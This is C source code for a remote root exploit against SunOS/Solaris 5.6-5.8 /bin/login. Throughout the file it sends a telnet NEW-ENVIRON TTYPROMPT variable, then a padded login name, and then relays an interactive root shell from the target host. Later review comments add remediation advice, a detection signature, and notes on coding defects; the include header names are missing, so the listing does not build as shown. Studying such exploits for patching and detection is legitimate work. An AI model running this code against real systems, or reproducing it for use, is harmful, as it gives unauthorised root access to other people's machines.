/*
 * SunOS 5.6,5.7,5.8 remote /bin/login root exploit
 * telnet negotiation learned from good ol' TCP/IP Illustrated
 * [mikecc/unixclan]
 *
 * bugtraq advisory: http://online.securityfocus.com/archive/1/293844
 *
 * yo to my friends: mstevens, jason, booterr, copperd, dave, ziphie,
 * shazam, macd, s0kket, syn, ironfist, ph33r, moke, and digitalfallout
 *
 */

/*
 * Review notes (a defender's reading of this listing):
 *
 *  - As the code suggests, the flaw is reached through /bin/login's handling
 *    of the TTYPROMPT environment variable delivered over the telnet
 *    NEW-ENVIRON option (see the advisory URL above).  The remedy is the
 *    vendor /bin/login patch referenced there, and not exposing telnet at all.
 *
 *  - On the wire the session is distinctive: a NEW-ENVIRON IS subnegotiation
 *    carrying TTYPROMPT, followed by a login name padded with 64 repetitions
 *    of " c" (see env() and main() below).  That sequence is a reasonable
 *    basis for a detection signature on telnet traffic.
 *
 *  - The ten header names on the #include lines below were lost when this
 *    page was extracted (the <...> part was read as markup), so the listing
 *    does not build as shown.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

void respond(int,char *);
void negotiate(int);
void env(int,char *,char *);
void will(int,int);
void wont(int,int);

/*
 * Entry point: parse -h host, -p port, -u user, resolve and connect to the
 * telnet port, build the login string and hand the socket to respond().
 *
 * Returns 0 on every path, including failures (errors are reported on stdout
 * only), so the exit status cannot be used to tell success from failure.
 */
int main(int argc,char **argv)
{
    struct sockaddr_in sock;
    struct hostent *pHe;
    int sd;
    short port = -1;            /* -1 means "not given"; see default_port */
    int x;
    char *host = NULL;
    char *user = NULL;
    char exp[1024];             /* login string: user name + 64 * " c" */
    int a;
    char *default_port = "23";

    printf("UC-login\n");
    printf("SunOS/Solaris 5.6,5.7,5.8 /bin/login remote exploit\n");
    printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");

    if (argc < 2) {
        printf("%s -h [-p port] [-u user]\n",argv[0]);
        return 0;
    }

    while ((a = getopt(argc,argv,"h:p:u:")) != -1) {
        switch (a) {
            case 'h': host = optarg; break;
            /* atoi() result is narrowed to short with no range check */
            case 'p': port = atoi(optarg); break;
            case 'u': user = optarg; break;
            default: printf("[-] invalid option.\n"); break;
        }
    }

    if (host == NULL) {
        printf("[-] must specify a host to attack\n");
        return 0;
    }
    if (user == NULL) user = "root";
    if (port < 0) port = atoi(default_port);

    /* gethostbyname() is the obsolete, non-reentrant resolver interface */
    if ((pHe = gethostbyname(host)) == NULL) {
        printf("Host lookup error.\n");
        return 0;
    }

    printf("[*] attacking %s:%d\n",host,port);
    printf("[*] opening socket\n");

    if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1) {
        printf("[-] could not create socket");   /* note: no trailing newline */
        return 0;
    }

    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    /* copies h_length bytes into the 4-byte s_addr; relies on an AF_INET result */
    memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);

    if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1) {
        printf("[-] failed to connect to %s\n",host);
        return 0;
    }

    printf("[*] connected!\n");
    printf("[*] setting up exploit string\n");

    /*
     * exp is 1024 bytes; user comes straight from argv and is copied with
     * strcpy/strcat, so a -u value longer than roughly 895 bytes overruns
     * this program's own stack buffer.  The loop appends 128 bytes of " c".
     */
    strcpy(exp,user);
    for (x = 0; x < 64; x++) {
        strcat(exp," c");
    }

    printf("[*] trying to login as %s\n",user);
    respond(sd,exp);

    return 0;
}

/*
 * 1. do telnet negotiation
 * 2. send the exploit string
 * 3. read and write data as if you logged in as root
 *
 * After the send this is a plain relay loop between stdin/stderr and the
 * socket.  It never returns: it loops until read() on the socket yields 0,
 * then calls exit(-1).
 *
 * Known rough edges (not fixed here):
 *  - only read() == 0 is handled; a -1 (error) result is not, so a
 *    persistent socket error would spin the loop printing empty buffers
 *  - socket data is printed with "%s", so anything after an embedded NUL
 *    byte in a read is dropped
 *  - select()/write() return values are ignored
 */
void respond(int sd,char *expstr)
{
    char buf[1024];
    int x;
    fd_set rset;

    printf("[*] negotiating\n");
    negotiate(sd);
    printf("[*] sending exploit string\n");
    write(sd,expstr,strlen(expstr));
    printf("[*] did it work? now press enter\n");
    fflush(stdout);

    /* select() clears non-ready descriptors, so both are re-added each turn */
    FD_ZERO(&rset);
    while (1) {
        FD_SET(sd,&rset);
        FD_SET(0,&rset);
        select(sd+1,&rset,0,0,0);
        if (FD_ISSET(sd,&rset)) {
            memset(buf,'\0',sizeof(buf));
            if ((x = read(sd,buf,sizeof(buf)-1)) == 0) {
                printf("Connection closed by foreign host.\n");
                exit(-1);
            }
            fprintf(stderr,"%s",buf);
        }
        if (FD_ISSET(0,&rset)) {
            memset(buf,'\0',sizeof(buf));
            if ((x = read(0,buf,sizeof(buf)-1)) > 0) {
                write(sd,buf,x);
            }
        }
    }
}

/*
 * use an environment variable
 *
 * structure of env variable usage is (matching the format string below):
 * 1. IAC
 * 2. SB
 * 3. TELOPT_NEW_ENVIRON
 * 4. TELQUAL_IS
 * 5. NEW_ENV_VAR
 * 6. (name)
 * 7. NEW_ENV_VALUE
 * 8. (value)
 * 9. IAC
 * 10. SE
 *
 * (all found in arpa/telnet.h and you specify name and value)
 *
 * The write length is hard-coded to 23, which is exactly 7 framing bytes +
 * strlen("TTYPROMPT") + strlen("abcdef") for the single call in negotiate();
 * any other name/value pair would be sent truncated or over-long.
 * NOTE(review): presumably the length is hard-coded because some of the
 * option bytes in arpa/telnet.h are 0, which would make strlen(buf) stop
 * early -- confirm against the header values on the build host.
 */
void env(int sd,char *name,char *val)
{
    char buf[1024];

    memset(buf,'\0',sizeof(buf));
    sprintf(buf,"%c%c%c%c%c%s%c%s%c%c",
            IAC,SB,TELOPT_NEW_ENVIRON,TELQUAL_IS,NEW_ENV_VAR,name,
            NEW_ENV_VALUE,val,IAC,SE);
    write(sd,buf,23); /* no error checking, uh-oh! */
}

/*
 * telnet negotiation needed for
 * talking with the telnet protocol
 *
 * Sends a fixed set of WILL/WONT answers blind, without reading the
 * server's DO/DONT requests first, then ships the TTYPROMPT variable.
 * NOTE(review): a server that negotiates a different option set is not
 * handled; the replies are simply written in this order.
 */
void negotiate(int sd)
{
    wont(sd,TELOPT_TTYPE);
    wont(sd,TELOPT_NAWS);
    wont(sd,TELOPT_XDISPLOC);
    will(sd,TELOPT_LFLOW);
    will(sd,TELOPT_LINEMODE);
    wont(sd,TELOPT_OLD_ENVIRON);
    will(sd,TELOPT_NEW_ENVIRON);
    will(sd,TELOPT_BINARY);
    env(sd,"TTYPROMPT","abcdef");
}

/*
 * send a telnet WONT
 *
 * structure of a telnet WONT is:
 * 1. IAC
 * 2. WONT
 * 3. what you wont do
 * (all of the above are found in arpa/telnet.h)
 *
 * Defect: sprintf() appends a terminating NUL, so it writes 4 bytes into
 * the 3-byte buf -- a one-byte stack overrun in this program itself.
 */
void wont(int sd,int opt)
{
    char buf[3];

    sprintf(buf,"%c%c%c",IAC,WONT,opt);
    write(sd,buf,3); /* no error checking, uh-oh! */
}

/*
 * send a telnet WILL
 *
 * structure of a telnet WILL is:
 * 1. IAC
 * 2. WILL
 * 3. what you will do
 * (all of the above are found in arpa/telnet.h)
 *
 * Same one-byte overrun as wont(): sprintf() writes 4 bytes into buf[3].
 */
void will(int sd,int opt)
{
    char buf[3];

    sprintf(buf,"%c%c%c",IAC,WILL,opt);
    write(sd,buf,3); /* no error checking, uh-oh! */
}